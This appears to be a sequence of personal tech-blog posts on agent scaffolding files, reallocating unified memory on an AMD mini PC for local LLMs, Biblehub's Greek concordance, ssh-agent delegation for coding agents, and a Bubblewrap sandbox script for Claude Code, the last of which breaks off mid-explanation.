You’ve done your initial project work with an agent and now you’re running out of context in the session.  You decide to start a new session and spend the first fifteen minutes re-establishing context. You describe your project. You explain what’s been built. You restate the requirements.  If you were clever at the end of your last session, you’re copying and pasting a “hand-off” prompt that the last session created. The agent begins. But its interpretation drifts slightly from where you left off, and you don’t notice until the output from your deployment/development run doesn’t quite fit the project.

You hand off work to multiple agents and discover (often too late) that one of your agents overwrote what another built. Nothing is tracking which agent created which files. You didn’t write in your dev log about why a particular approach was chosen over the alternatives. A decision made in session four gets silently reversed in session twelve, and the reversal breaks something that was working.

You fear going to sleep and forgetting what you did today. You find yourself holding the entire project in your head. Your diary has a lot of copy/paste from sessions so you can review the decisions you made.  You are the only thread of continuity between sessions. The agents are productive when you’re directing them, but the moment you step away, the project stalls. Or worse, it moves confidently in the wrong direction. 

Agentic development looks like it could reduce the human burden, but it relocates it. You stopped writing code and started repeating context. You stopped building features and started answering the same questions at the top of every session. What are we building? Where are we? What has been decided? What remains?

If these questions have become your daily ritual, the problem is not your agents. The problem is the absence of scaffolding around them.  Let’s discuss what outcomes we should produce that will get us out of this developer doom loop.

Agent features that defeat context fatigue

To move from superficial autonomy to something sustainable, repeatable, and auditable, your agents need to produce specific outcomes.  I’ve had some success with patterns that fix these problems.  These patterns can be evaluated as features that should be embedded in your agent flows.  If you invest in these patterns, it will produce conditions where your agents manage context in a way that takes away your burdens.  My recommendation is that you review the agents you’ve created and ask yourself how they can produce the following outcomes:

Persistent context across sessions. Project knowledge, state, and history must survive the session boundary without requiring a human to re-explain them. Context has been the first casualty of session-based development. It should be the first thing we protect. Your agents should write state to disk.  Stop holding project context in your mind.  How does your agent acquire project context?  How does your agent update the project’s context to project planning files as it works?

Explicit phase and progress awareness. An agent must know what phase the project currently occupies and what has already been accomplished before it takes action. Agents lack an innate sense of where they are. The absence of this awareness is the root of duplicated effort, skipped steps, and misplaced confidence.  Agents should log data about their current phase & development progress.  Your agents should review progress logs & development artifacts that help them understand where they are in the project’s development & deployment before doing any work.  How do your agents identify project status?  How do your agents make incremental edits to project status documents to reflect completed work?

Clear provenance and accountability. Every artifact needs a traceable author. In multi-agent systems, files appear and change and sometimes break. Without an ownership record, debugging becomes archaeology. You spend time reverse engineering authorship of a change instead of solving problems.  Make your agents implement git commits that document which agent was responsible for a change.  How do your agents make authorship of code auditable?

Preserved decision rationale. The reasoning behind decisions, including the alternatives considered and the tradeoffs accepted, must be captured and accessible to future agents. Decisions without rationale become immovable. Nobody changes what nobody understands, and nobody preserves what nobody remembers choosing. When you build big enough projects with agents, you can be overcome with fear about changing an existing feature. You can overcome this anxiety by building agents that document their decision logic. Ensure that agents log the solutions they considered and the reasoning behind the solution they picked. Evaluate how your agents can be updated to document what decisions they made and what solutions were considered.

Stable alignment to product intent. A canonical reference must anchor all agents to a shared definition of what is being built. Without scaffolding, scope drift is quiet. Every session reinterprets the project goal by a few degrees. Over time the project curves away from its intent, and the deviation only surfaces when components fail to fit together.  Your counterspell: Give all agents access to the same product spec every time they run.  Explore how your agents ensure that they always align with your project’s north star goals & requirements.

Human-as-supervisor, not human-as-context-provider. The human role must shift from re-establishing context each session to reviewing, approving, and steering. Audit your development time.  If you are finding yourself revisiting a pattern of re-establishing context, forgive yourself and take a break.  You need to spend some time thinking about how your development flow manages context.  

Your agents should be launching by accessing a file with a stable initial context statement.  Your agents should write to it as they make decisions and changes.  This file should document decisions and update the session initiation context to describe the state that evolves as your agents build upon your foundation.  Your agents should spend their first moments figuring out what has been done so far, what lessons have been learned and where do we need to work next.  Agents should be able to discover if they’re about to break away from any thoughtfully established conventions.  Log all the time you’re spending making decisions and pasting context.  Evaluate how you could change your agents to do that work for you.

Low-cost resumption. Any agent must be able to pick up interrupted work quickly and accurately without re-analyzing the full project or guessing at prior state. Resumption remains one of the most expensive moments in agentic workflows. It should be one of the cheapest.  Cold starts of sessions should cost a file read, not a conversation.  For every agent you build, evaluate their mechanisms for resuming an interrupted session.  Don’t settle for /resume

Visible and manageable technical debt. Past decisions must be inspectable so that agents can distinguish between choices worth preserving and choices worth revisiting. Invisible debt accumulates in both directions. Agents blindly keep decisions they should change. Agents recklessly change decisions they should keep. Both paths lead to breakage. Make your agent’s historical decisions queryable. Evaluate your agents: how do they log the decisions they make? How do your agents avoid re-litigating a well established pattern? What criteria do your agents follow before making a change to an established pattern?

Coordination without collision. Agents must operate with enough shared awareness to avoid duplicating, contradicting, or overwriting each other’s contributions. Collision between agents can feel random, but it is structural. It follows directly from the absence of shared state.  Shared state is cheaper than conflict resolution.  Your agents should create & update project artifacts that capture project development state.  How do your agents use files for coordination with other agents?

Five artifacts I use for scaffolding

I tried to describe the end state we want to cultivate.  Here are some of my coordination artifacts that I use to reduce my time in an interactive agent.  

These artifacts are documents that my agents create, maintain, and consult as part of their execution loop.  For every project, my agents work around: 

A Product Requirements Document that holds the high-level product statement that all agents build against. It is the fixed point we are working towards. When an agent needs to know whether a feature aligns with the product’s intent, this is where it looks.

A Features List Document that summarizes the capabilities that must be implemented. It tells an arriving agent what has been built and what remains. Resumption becomes a matter of reading a list, not reconstructing a plan. 

A PRD-Agent-Reasoning File that captures the decisions agents have made, along with the options they considered before deciding. This is the institutional memory of the project. It turns opaque choices into auditable decisions.

A Project Manifest that carries a brief project description, timestamps for creation milestones, and a record of which development phases have been completed. It answers the question every new session asks first: where are we?

An Agent-Ownership File that maps every file to the agent that created it. If you’re ever wondering whether you know for sure which agent produced a file, you’re in a pattern that will cause you problems. Build agents that make accountability traceable. When something breaks, you have a map to consult to discover which agent built it.

What problems are solved with this scaffolding?

My artifacts serve multiple outcomes, but one outcome draws from all five: the shift from human-as-context-provider to human-as-supervisor. 

  • The PRD eliminates “what are we building?”
  • The Project Manifest eliminates “where are we?”
  • The Ownership file eliminates “who did this?”
  • The Reasoning file eliminates “why was this done?”
  • The Features List eliminates “what is left?”

If you, the human, keep finding yourself in the decision loop, knock it off. Use scaffolding artifacts. Resist the temptation to fiddle. Make it easy for your agents to make decisions you can audit later. If you can’t confidently start the project over from scratch, that’s a signal you’re trying to maintain too much control. Build guardrails and loosen your reins.

Development loops become repeatable when context persists. They become auditable when agents record their decisions. Agentic development loops become enhanceable when agents preserve their rationale alongside outcomes.  The models will grow more capable, but the scaffolding problem will remain because it is not a problem of intelligence. It is a problem of continuity.  Continuity has always depended upon something being written down.  

I’d love to hear what you think about this.  If you’re struggling with these problems, let’s connect!

Allocating RAM for GPU performance on self-hosted LLM systems with integrated System & GPU RAM

Are you sure that the system you’re running self-hosted LLMs on has properly allocated its GPU memory?

I was doing some work on my 128 GB Ryzen AMD mini PC. I operate this machine as a Linux server dedicated to self-hosted AI infrastructure. I had run into a performance problem on the system where I had saturated all resources and experienced a hard lock. After rebooting to do some troubleshooting, I discovered it didn’t look like my system was operating with 128 GB of RAM.

Diagnosing the problem

This machine’s purpose is hosting local AI inference. The product listing indicated 128 GB of unified memory. Did GMKTec/Amazon ship me the wrong unit? I tested for system memory:

$ free -h
  Mem: 62Gi

Linux reported sixty-two gigabytes. I tested for the GPU’s VRAM total from the kernel:

$ cat /sys/class/drm/card*/device/mem_info_vram_total
  68719476736

Sixty-four gigabytes on the graphics side. Sixty-two visible to the operating system. That accounts for roughly 126 gigabytes if you add them together, but the system showed only half of the memory I thought I paid for.

Memory in integrated GPU/CPU systems

The processor on this system carries an integrated GPU. Unlike desktop workstations, there is no discrete graphics card on a separate board with dedicated memory. Every byte of physical RAM lives in one unified pool of LPDDR5X shared between CPU and GPU. I should have known this, but I didn’t. I haven’t built a gaming PC in over 20 years. On this hardware, the distinction between “system memory” and “graphics memory” exists only in firmware. On this machine, the BIOS has configurations for assigning memory to the CPU and GPU.

Integrated graphics have been operating this way for a while. Intel’s onboard GPUs quietly borrow anywhere from 128 megabytes to a gigabyte or two of system RAM.

The Intel 810 chipset (1999) was Intel’s first integrated graphics chipset and used what Intel called “Unified Memory Architecture” (UMA). It borrowed 7-11 MB of system RAM for the GPU’s frame buffer, textures, and Z-buffer. This document describes the Graphics and Memory Controller Hub directly.

Intel later formalized this as DVMT (Dynamic Video Memory Technology), which let the graphics driver and OS dynamically allocate system RAM to the iGPU based on real-time demand. The BIOS setting “DVMT Pre-Allocated” (letting you choose 32 MB, 64 MB, 128 MB, etc.) became a standard fixture on Intel-based motherboards for the next two decades. https://www.techarp.com/bios-guide/dvmt-mode/ documents the DVMT modes in detail.

Intel’s own support documentation still explains this architecture for current hardware: https://www.intel.com/content/www/us/en/support/articles/000020962/graphics.html confirms that integrated Intel GPUs use system memory rather than a separate memory bank.

The kernel-level term is “stolen memory” (or Graphics Stolen Memory / GSM). https://igor-blue.github.io/2021/02/10/graphics-part1.html documents how the UEFI firmware reserves a region of physical RAM for the GPU through the Global GTT, managed by hardware and invisible to the OS’s general memory pool.

This design lineage runs from the Intel 810 in 1999 through every Intel iGPU since, with the same fundamental mechanism: firmware carves system RAM away from the OS and hands it to the GPU. The Strix Halo platform applies the same idea at 1000x the scale.

I’ve never noticed because I’ve been operating with macOS for the last 15 years.

The M-series chips (M1 through M4) share the same fundamental architecture: CPU, GPU, and Neural Engine all access one physical pool of memory. But Apple and AMD made different choices about how to manage that pool.

On Apple Silicon, macOS sees all the memory and allocates it dynamically. If you buy a MacBook with 64 GB of unified memory, top and Activity Monitor report 64 GB. The GPU draws from that pool on demand. The CPU draws from it on demand. No firmware partition divides them. When the GPU needs 20 GB for a rendering task, it gets 20 GB. When it finishes, that memory returns to the general pool. The OS arbitrates in real time.

But on this purpose-specific machine, the default resource allocation produces performance degradation. It looks like GMKTec is assuming Windows and gaming are going to be the main application of this hardware. If your objective is running LLMs locally, the default config is going to need adjustments.

I reached out to GMKTec to clarify if there was a hardware problem. They indicated that the default config assigns 64 gigabytes to graphics and 64 gigabytes to the system. To fix this inefficient configuration, I needed to get into the BIOS and adjust the split.

Adjusting memory allocated to GPUs

That raised a practical question: how much memory should I allocate to the Host OS versus the GPU?

My system has Docker containers handling most of the system workload: a search engine, a workflow automation platform, a CMS, a kanban board, a chat interface for local models and the databases backing all of them. My Gnome/COSMIC desktop session was also running, plus a couple of terminal processes consuming their share of memory. Total system memory use hovered around 12 gigabytes. Fifty gigabytes of allocated system RAM sat idle.

The GPU told the same story from a different angle. Of its 64-gigabyte allocation, 330 megabytes held active data. The local inference server sat installed and waiting. Models rested on disk, ready to load, but nothing filled the VRAM. The GPU’s enormous partition accomplished almost nothing.

$ cat /sys/class/drm/card*/device/mem_info_vram_used
348594176

That returned 348,594,176 bytes, which is roughly 330 MB. The companion command for the total allocation was:

$ cat /sys/class/drm/card*/device/mem_info_vram_total
68719476736

That returned 68,719,476,736 bytes, which is 64 GB.

Both values come from the amdgpu kernel driver, which exposes them as sysfs files under /sys/class/drm/card*/device/. The mem_info_vram_used file reports how much of the GPU’s allocated partition is actively holding data at that moment. The mem_info_vram_total file reports the size of the partition itself.
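If you want the same numbers in human-readable units, a quick awk one-liner converts the sysfs byte counts (the card number under /sys/class/drm may vary on your system):

# Convert the sysfs byte counters to GiB for easier reading
awk '{ printf "total: %.1f GiB\n", $1 / (1024^3) }' /sys/class/drm/card*/device/mem_info_vram_total
awk '{ printf "used:  %.1f GiB\n", $1 / (1024^3) }' /sys/class/drm/card*/device/mem_info_vram_used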

This machine was built to run large language models. I wasn’t getting the utilization I expected. A 70-billion parameter model quantized to Q8 needs roughly 70 gigabytes of VRAM. With this system’s default, larger models don’t fit. I rebooted into the BIOS and bumped the GPU allocation to 96 gigabytes. The system side drops to 32 gigabytes, which still exceeds my current workloads by a wide margin. Twelve gigabytes of active use against 32 gigabytes of capacity leaves generous headroom for growth.
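After the BIOS change and a reboot, the same two checks should reflect the new split (96 GiB is 103,079,215,104 bytes):

free -h   # the system side should now report roughly 32 GiB
cat /sys/class/drm/card*/device/mem_info_vram_total   # should now print 103079215104 (96 GiB)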

Post fix memory layout

Aside on model quantization

When you run something like ollama pull deepseek-coder-v2:16b, the quantization level is baked into that specific model file. If you look at the Ollama model library, you’ll typically see tags like:

  • model:7b-q4_0
  • model:7b-q5_K_M
  • model:7b-q8_0
  • model:7b-fp16

The Q4, Q5, Q8, fp16 suffixes indicate the quantization level. Lower numbers mean more compression (smaller file, less VRAM, lower quality). Higher numbers and fp16 mean less compression (larger file, more VRAM, better quality). Quantization reduces the numerical precision of a model’s weights. A weight stored at fp16 uses 16 bits. Q8 uses 8 bits. Q4 uses 4 bits. Fewer bits mean the weight carries a rounded approximation of its original value instead of the precise one the model learned during training.
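A back-of-the-envelope way to see what this means for memory: a model’s weight footprint is roughly its parameter count times bits per weight, divided by 8 to get bytes, plus overhead for the KV cache and activations. A small sketch, using a hypothetical 70-billion parameter model:

# Weight-only VRAM estimate: params (billions) x bits / 8 = GB.
# Real usage runs higher once the KV cache and activations are counted.
params_b=70
for bits in 4 8 16; do
  echo "${bits}-bit: ~$(( params_b * bits / 8 )) GB"
done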

Where you’ll notice “higher quality” performance:

  • Complex reasoning chains. A Q4 model is more likely to lose the thread on multi-step logic, math problems, or long code generation. The accumulated rounding errors across billions of weights degrade the model’s ability to hold coherent structure over long outputs.
  • Nuance in language. Word choice becomes slightly flatter. A fp16 model might select a precise, unexpected word. The Q4 version gravitates toward more generic alternatives. The difference is hard to spot in a single response but becomes noticeable over a session.
  • Instruction following. Heavily quantized models drift from instructions more often. They might ignore a formatting constraint, repeat themselves, or partially answer a question. The precision loss makes the model slightly less responsive to the signal embedded in your prompt.
  • Factual reliability. Q4 models hallucinate marginally more. The degraded weights weaken the model’s ability to distinguish between what it “knows” confidently and what it is guessing at.

Where you probably won’t notice “lower quality” quantization levels:

  • Simple question and answer.
  • Casual conversation.
  • Summarization of short texts.

Ollama does not re-quantize a model at load time. You pick your quantization when you pull the model. With this change, I can now pull larger models at higher precision for experimentation & training. This improves inference quality and makes for a far better experience with models.

Hope this helps. To summarize:

There are a few systems that have come out in recent months that are good candidates for running local LLMs. If you get a mini PC with AMD hardware, you’re likely going to need to adjust the RAM split for your inference goals. I covered how I encountered a problem that led me to discover issues with my config, and I summarized how to reason about changing the config for better performance.

Want help building self-hosted LLMs? Let’s connect!

Post Script:
If you’re exploring buying hardware for self hosting and considering an AMD GPU- you should absolutely take some time to read https://strixhalo.wiki/Guides/Buyer's_Guide

The Strix Halo wiki has a ton of valuable & relevant resources.

Some Bible Translatin’

Biblehub is a nice website with a finicky UI. Here are some instructions on how to use Biblehub’s “Strong’s Concordance” to perform two actions:

  • Researching the Greek language version of terms in the New Testament
  • Finding other passages in the bible that use the relevant term 

First, go to Biblehub and search a phrase, e.g. “Joyful Always” from 1 Thessalonians 5:16.

Note that when Biblehub finds a hit for this phrase, there will be a drop-down item you can select for it. YOU MUST CLICK ON THE DROP-DOWN ITEM. Hitting “enter” will take you to a search of the database and just give you a list of instances. Clicking on the item takes you to the identified passage where the term is found. If no drop-down shows up, you may have a typo, or the page is loading very slowly.

This will take you to the verse. You can select a bible translation to compare the passage’s language in different translations. Note the listings of all bible versions:

Screenshot of different bible translations of the specified verse.

You now can compare different translations for their version of the statement. 

To research the Greek term for “rejoice always”, click on “Strong’s” from this page.

This will take you to a page that provides the original Greek for the translated section:

Greek translations of “Always Rejoice” from 1 Thessalonians 5:16

To find a cross-reference list of all other passages in the bible that use that term, click on the Greek word (in this case, Chairete). This enables you to see other passages that relate to the term.

Bible Passages that use the Greek word “Chairete”

You now are a scholar who can find the original Greek for your bible passages- and find other bible passages that reference the same term! Woo!

Giving coding agents ssh access without disclosing secrets

Giving LLM agents read access to private SSH keys is the hottest new security mistake since the hardcoded password.

You’ve set up Claude Code (or Cursor, or Copilot) and your coding agent needs to connect to a remote system.

The prompt asks you: how should the agent authenticate?

What’s going on here?

ssh-keyscan is a tool that gathers the public SSH host keys of remote systems. It reduces some friction in ssh by letting you populate the known_hosts file ahead of time instead of being interactively prompted to verify each new host key on first connection.
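For example, to fetch a host’s keys yourself (the hostname here is a placeholder):

# Grab the remote host's public host keys and append them to known_hosts
ssh-keyscan example.com >> ~/.ssh/known_hosts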

Claude’s hoping I left a key around for the remote host. It will try to add the host’s key to the known_hosts file, which will enable it to make a direct connection to the other system if I have password auth disabled.

For extra safety, it won’t accept any scenario where the remote host’s ssh key has changed. This is “safe” because the events where a system offers a new key should be very limited: regularly being prompted to accept a new key for a host is an indicator that someone has brought a malicious server online with the same hostname. But these measures are incomplete. In this instance, the agent is trying to connect to a host even though it has no key to authenticate with.

It’s making a valiant effort- but it will fail. I ssh-copy’d a key to this system, but I’m running sandboxed Claude and protecting the agent from access to the ssh key.

Some folks might entertain a dangerous solution: paste in your SSH key, set an environment variable, or hand over your Git credentials. It works… why worry?

You should be wondering:

Where will that secret actually go? Is it logged somewhere? Is the LLM provider training against my private key? Can the agent exfiltrate it? What happens if the agent’s process gets compromised?

The moment you hand a credential to an AI agent, you’ve lost control of it. You can’t audit where it went, you can’t revoke access without rotating secrets, and you’ve given an LLM a secret that must never leak. Chat histories fill up with desirable secrets. This should be concerning.

There is a better way to give your agents access to other systems than handing them a private key. It’s been around for decades. Networking and operations engineers use it all the time, but it seems to be less well known among devs. By the end of this post, you’ll know how to give a coding agent full SSH authentication capability while ensuring the agent never knows your private key. You’ll have greater confidence knowing access is revocable with a single command, and even a fully compromised agent can’t steal your private keys.

What is SSH-agent?

ssh-agent is a background process that holds your decrypted private keys in memory so you don’t have to re-enter your passphrase every time you use them.

How ssh-agent works:

  1. Your private key (e.g. ~/.ssh/id_ed25519) is stored encrypted on disk, protected by your passphrase
  2. You run ssh-add to decrypt the key and hand it to the agent
  3. The agent holds the decrypted key in memory
  4. When you ssh somewhere, the SSH client asks the agent to perform the cryptographic signing — the private key never leaves the agent process

Why ssh-agent exists:

  • Convenience — type your passphrase once per session instead of every connection
  • Security — the decrypted key lives only in memory, never written to disk unencrypted. Programs that need to authenticate ask the agent rather than accessing the key file directly
  • Forwarding — with ssh -A, the agent can be forwarded to remote hosts so you can hop between machines without copying your private key around

It’s essentially a secure key wallet that runs in the background for the duration of your login session.

How ssh-agent keeps ssh keys private from AI

ssh-agent implements a delegation without disclosure pattern:


  ┌─────────────┐        ┌───────────┐        ┌──────────────┐
  │  ssh-agent  │◄───────│  Coding   │───────►│  Remote Host │
  │ (your keys) │ signs  │  Agent    │  SSH   │  (GitHub,    │
  │             │ data   │  process  │  conn  │   server)    │
  └─────────────┘        └───────────┘        └──────────────┘
  1. You start ssh-agent and unlock your key with ssh-add
  2. The coding agent inherits the $SSH_AUTH_SOCK environment variable — a Unix socket path to where the ssh-agent process is listening.
  3. When the agent needs to authenticate, SSH asks the agent process to sign a challenge
  4. The agent process asks ssh-agent (via the socket) to do the signing
  5. ssh-agent signs the challenge and returns the signature
  6. The private key never crosses the socket. Only signatures go back.

When you start ssh-agent, it creates a socket file (e.g., /tmp/ssh-XXXXX/agent.12345). It then exports the $SSH_AUTH_SOCK environment variable, which points to that socket. Any process that inherits this variable can communicate with the agent. SSH clients use this socket to ask ssh-agent to sign authentication challenges. The socket is a communication channel, not a credential. Reading the variable only gives you a path — without the ssh-agent process behind it, the socket is useless. This gives your agent the ability to ask ssh-agent to sign its requests without ever having access to the private key.
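You can verify for yourself that the variable is just a path and that no key material is reachable through it:

echo "$SSH_AUTH_SOCK"   # just a filesystem path
file "$SSH_AUTH_SOCK"   # reports a socket, not a regular file
ssh-add -l              # lists key fingerprints, never private key material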

You may ask: how do I keep rogue processes from requesting signatures from ssh-agent? Unfortunately, if they’re running under your user account, you’re going to have challenges. Everything that runs as you has the same access rights as you. You’ll want to move those potentially rogue processes to another user account and apply some ACLs. The nice thing about ssh-agent is you can just kill it when you’re done delegating SSH authentication to agentic processes. But if you need to be cautious:

  • Run the agent in a sandboxed environment (container, VM) with its own ssh-agent holding limited-scope keys
  • Use deploy keys with read-only access instead of your personal key
  • Use short-lived certificates (e.g., via Vault or Teleport) instead of long-lived keys
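The first two bullets combine nicely: run a second ssh-agent on its own socket, load only a limited-scope deploy key into it, and hand that socket (not your main one) to the sandboxed agent. The socket path and key name here are hypothetical:

# A dedicated agent holding only a limited-scope deploy key (hypothetical paths)
eval "$(ssh-agent -a "/run/user/$(id -u)/agent-sandbox.sock")"
ssh-add ~/.ssh/deploy_readonly
# launch the sandboxed agent with SSH_AUTH_SOCK pointing at this socket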

Why This Matters for AI Agents Specifically

Least privilege by design The agent can authenticate but cannot exfiltrate the secret. Even if the agent’s process is compromised, the attacker gets a socket that only works while your agent session is alive — not a portable credential.

Auditability The agent can’t copy the key and use it later or from another machine. Access is bound to the lifetime of the socket.

Revocability Kill the ssh-agent process or remove the key with ssh-add -d, and the agent instantly loses access. No secret rotation needed.

No secret in the environment Compare this to the common pattern of stuffing API_KEY=sk-… into environment variables.
Those can be read by any process, printed with env, leaked in logs. The SSH_AUTH_SOCK only points to a socket. Reading the path to a socket is generally not a security sensitive action.

The Capability-based security model

This is an instance of a capability-based security model. Instead of sharing a secret (something you know), you share a capability (something you can do through a controlled channel). The coding agent gets the capability to authenticate as you, scoped to:

  • Time — only while the agent process runs
  • Mechanism — only through the SSH protocol
  • Operation — only signing challenges, not extracting keys

This is the same idea behind hardware security modules (HSMs), smart cards, and FIDO keys — the secret never leaves a trusted boundary, and all consumers interact through a signing oracle.

Practical Example

Start the session:

eval "$(ssh-agent -s)"

Add your key to the agent:

ssh-add ~/.ssh/id_ed25519

You’ll be prompted for the key’s passphrase, and now ssh-agent has the ability to sign requests without exposing the private key.

You can now launch your coding agent — it inherits SSH_AUTH_SOCK. Your coding agent can now git pull, ssh deploy, etc. When you’re done, kill the agent:

ssh-agent -k   # all delegated access revoked instantly

You can see that killing the agent kills the socket. A coding agent can be invoked and have full SSH access without reading a secret.

Agent frameworks should be built using capability delegation. Don’t give AI agents read access to credentials. ssh-agent is a tool you can use to provision access privileges without disclosing secrets. It’s a key tool for granting AI systems access to infrastructure.

Do you need help building secure agentic products and workflows?

Let’s connect!

Post script:

After I posted this on LinkedIn, Luke Hinds observed similar ideas behind a recent pull request by Francois Proulux, which added UNIX domain socket support for using Secure Enclave-backed ssh-agents in Nono.sh. Worth a look!

A detailed writeup of Claude Code constrained by Bubblewrap.

An AI agent that can edit files can also delete them. Here’s a detailed explanation of how I set boundaries while still keeping Claude powerful.

When you let an AI assistant run commands on your computer, you face a problem: the assistant needs enough access to help you, but you don’t want it wandering through your entire system, reading your .env files, scanning your photos. Last week I wrote about how you can use Bubblewrap to prevent agents from accessing your files. There were some interesting comments on HackerNews that inspired me to do some further experimentation and explanation of my config.

I wanted to write a more detailed summary of this config for anyone who is going to try to incorporate Bubblewrap into their workflow. I also want to make it insanely easy for you to get started with your bubble wrapping. To that end, I have a couple of Git repositories you can clone to get started.

If you want to get started with bubblewrap+claude, you can use one of my sample scripts. Btw- I also created versions for Firejail & Apple’s “Containers”

https://github.com/CaptainMcCrank/SandboxedClaudeCode

The bubblewrap script passes all arguments through to Claude via “$@”. Just append your arguments after the script:

./bubblewrap_claude.sh --dangerously-skip-permissions "ruminate on the nature of life"

Don’t trust strangers on the Internet. Here is a git repository of tests you can use to prove the sandbox works. Read them and understand them. I have exposition below that explains each test in detail. It will help you execute the tests and validate that the controls work.

https://github.com/CaptainMcCrank/BlogCode/tree/main/BubblewrapTests

The approach above will give your bubblewrap container access to a pared-down file system; the script below shows exactly which paths get bound and how.

I welcome collaboration! Please file git issues against my code if you think you have a better approach!


The Complete Command

Here’s the full Bubblewrap command. Save this as a script (e.g., sandboxed-claude.sh), make it executable with chmod +x sandboxed-claude.sh, then run it from any project directory.

#!/usr/bin/env bash

# Optional paths - only bind if they exist
OPTIONAL_BINDS=""
[ -d "$HOME/.nvm" ] && OPTIONAL_BINDS="$OPTIONAL_BINDS --ro-bind $HOME/.nvm $HOME/.nvm"
[ -d "$HOME/.config/git" ] && OPTIONAL_BINDS="$OPTIONAL_BINDS --ro-bind $HOME/.config/git $HOME/.config/git"

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --ro-bind /etc/resolv.conf /etc/resolv.conf \
  --ro-bind /etc/hosts /etc/hosts \
  --ro-bind /etc/ssl /etc/ssl \
  --ro-bind /etc/passwd /etc/passwd \
  --ro-bind /etc/group /etc/group \
  --ro-bind "$HOME/.ssh/known_hosts" "$HOME/.ssh/known_hosts" \
  --bind "$(dirname "$SSH_AUTH_SOCK")" "$(dirname "$SSH_AUTH_SOCK")" \
  --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
  $OPTIONAL_BINDS \
  --ro-bind "$HOME/.local" "$HOME/.local" \
  --bind "$HOME/.npm" "$HOME/.npm" \
  --bind "$HOME/.claude" "$HOME/.claude" \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --setenv HOME "$HOME" \
  --setenv USER "$USER" \
  --setenv SSH_AUTH_SOCK "$SSH_AUTH_SOCK" \
  --share-net \
  --unshare-pid \
  --die-with-parent \
  --chdir "$PWD" \
  "$(which claude)" "$@"

This looks complex. I promise it’s not. The only weirdness is at the beginning, where the script checks for optional paths like .nvm and .config/git before binding them. Not everyone uses nvm for Node.js management, and git’s config directory location varies. If you use other version managers (like fnm, asdf, or volta), add similar conditional binds for their directories.

The rest of this post explains what each piece does and why I included it.


The System Tools

Your computer stores its programs in folders like /usr, /lib, and /bin. These folders contain thousands of tools: file editors, network utilities, programming languages, and more.

I give the AI read-only access to these folders. “Read-only” means the AI can use these tools but cannot change them. The AI can run git to manage code. The AI can run node to execute JavaScript. But the AI cannot replace these programs with different versions or delete them.

Without these folders, every command fails with “command not found.” The sandbox contains no programs to run.

I also share a few files from /etc, your computer’s configuration folder:

  • /etc/resolv.conf: Without this, DNS lookups fail. The AI cannot translate “github.com” into an IP address, so git clone and npm install break.
  • /etc/ssl: Without this, HTTPS connections fail. The AI cannot verify that a server is who it claims to be.
  • /etc/passwd and /etc/group: Without these, programs display raw numeric IDs instead of usernames. Git commits show “1000” instead of “patrick.”

Your Personal Files

You keep important files in your home folder. Git needs your .gitconfig file to know your name and email. Node.js lives in your .nvm folder.

I share these files as read-only. The AI can use your git identity to make commits. But the AI cannot change your git settings or modify your configuration files.

SSH Access Without Exposing Your Keys

SSH keys prove your identity to remote servers. Exposing them directly to the sandbox creates risk—the AI could read your private key files. I use a safer approach: SSH agent forwarding.

The SSH agent runs outside the sandbox on your host machine. It holds your decrypted keys in memory. Programs inside the sandbox can ask the agent to sign requests, but they never see the actual key material.

Here’s how to set it up:

Step 1: Start the SSH agent (if not already running)

Most Linux desktop environments start the agent automatically. Check if yours is running:

echo $SSH_AUTH_SOCK

If this prints a path like /run/user/1000/keyring/ssh, your agent is running and you’re set.

Important: If SSH_AUTH_SOCK is empty, you can start an agent manually with eval "$(ssh-agent -s)". However, manually started agents create sockets under /tmp (e.g., /tmp/ssh-XXXXX/agent.1234). This conflicts with our sandbox’s --tmpfs /tmp mount, which creates an isolated /tmp that hides the host’s socket.

If you must use a manually started agent, either:

  1. Start the agent with a custom socket location: ssh-agent -a /run/user/$(id -u)/ssh-agent.sock and export SSH_AUTH_SOCK accordingly
  2. Or move the --tmpfs /tmp line in the script to appear before the --bind "$(dirname $SSH_AUTH_SOCK)" line (a bind mount applied after the tmpfs overlays it for that specific path)

For simplicity, I’d recommend using your desktop environment’s built-in agent when possible.
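Concretely, option 1 looks like this (a socket under /run/user survives the sandbox’s tmpfs over /tmp):

# Start a manual agent on a socket outside /tmp
eval "$(ssh-agent -a "/run/user/$(id -u)/ssh-agent.sock")"
echo "$SSH_AUTH_SOCK"   # should print the /run/user/... path, not /tmp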

Step 2: Add your key to the agent

ssh-add ~/.ssh/id_ed25519

Replace id_ed25519 with your key’s filename. The agent prompts for your passphrase once, then holds the decrypted key in memory.

Step 3 (Optional but recommended): Require confirmation for each use

ssh-add -c ~/.ssh/id_ed25519

The -c flag tells the agent to ask for confirmation every time something tries to use the key. A dialog box appears on your screen: “Allow use of key?” You must click confirm. The AI cannot bypass this—the prompt happens outside the sandbox.

What this buys you:

Approach                 AI can read private key?   AI can use key silently?
Direct ~/.ssh binding    Yes                        Yes
SSH agent                No                         Yes
SSH agent with -c flag   No                         No

The sandbox script binds only ~/.ssh/known_hosts (so SSH can verify server identities) and the agent socket (so SSH can request signatures). Your private key files stay outside the sandbox entirely.


The Working Directory

Your goal is to develop software within a specific project folder. The AI needs write access to that folder to create files, modify code, and delete outdated artifacts.

I bind the current working directory ($PWD) with read-write access. When you run the sandbox script from /home/youruser/projects/my-app, the AI can modify anything inside my-app. When you run it from a different folder, the AI works there instead. The sandbox adapts to wherever you invoke it.

This scoping provides two benefits. First, the AI can do useful work—writing code, running builds, managing files. Second, the AI cannot touch anything outside that folder. Your other projects, your documents, your system files all remain invisible and unreachable.

I also give write access to two other locations outside your project folder.

The .npm folder stores downloaded packages. When the AI runs npm install, npm caches packages here so future installs run faster. Without write access, the AI could still install packages into your project’s node_modules, but every install would re-download everything from scratch. With write access to .npm, the AI can install dependencies at normal speed and benefit from cached packages across all your projects.

The .claude folder stores authentication credentials. This binding deserves special attention. When you first run Claude, you authenticate through your browser. Claude stores a session token in ~/.claude so you don’t repeat this process every time. Without write access to this folder, the sandbox cannot persist your login. You would need to re-authenticate every time you start the sandboxed Claude—a significant usability problem. With write access, you log in once and the session persists across sandbox invocations.


The Fake Temporary Folder

Every program needs a place to store temporary files. Normally, programs use /tmp, a shared folder visible to everything on your computer.

I create a fake /tmp that only the AI can see. When the AI writes temporary files, those files exist only inside the sandbox. When the sandbox closes, those files vanish.

This prevents the AI from leaving debris scattered across your system. It also prevents the AI from reading temporary files that other programs created.


Process Isolation

Your computer runs hundreds of processes at once: your web browser, your music player, system services, and more. Normally, any program can see the full list.

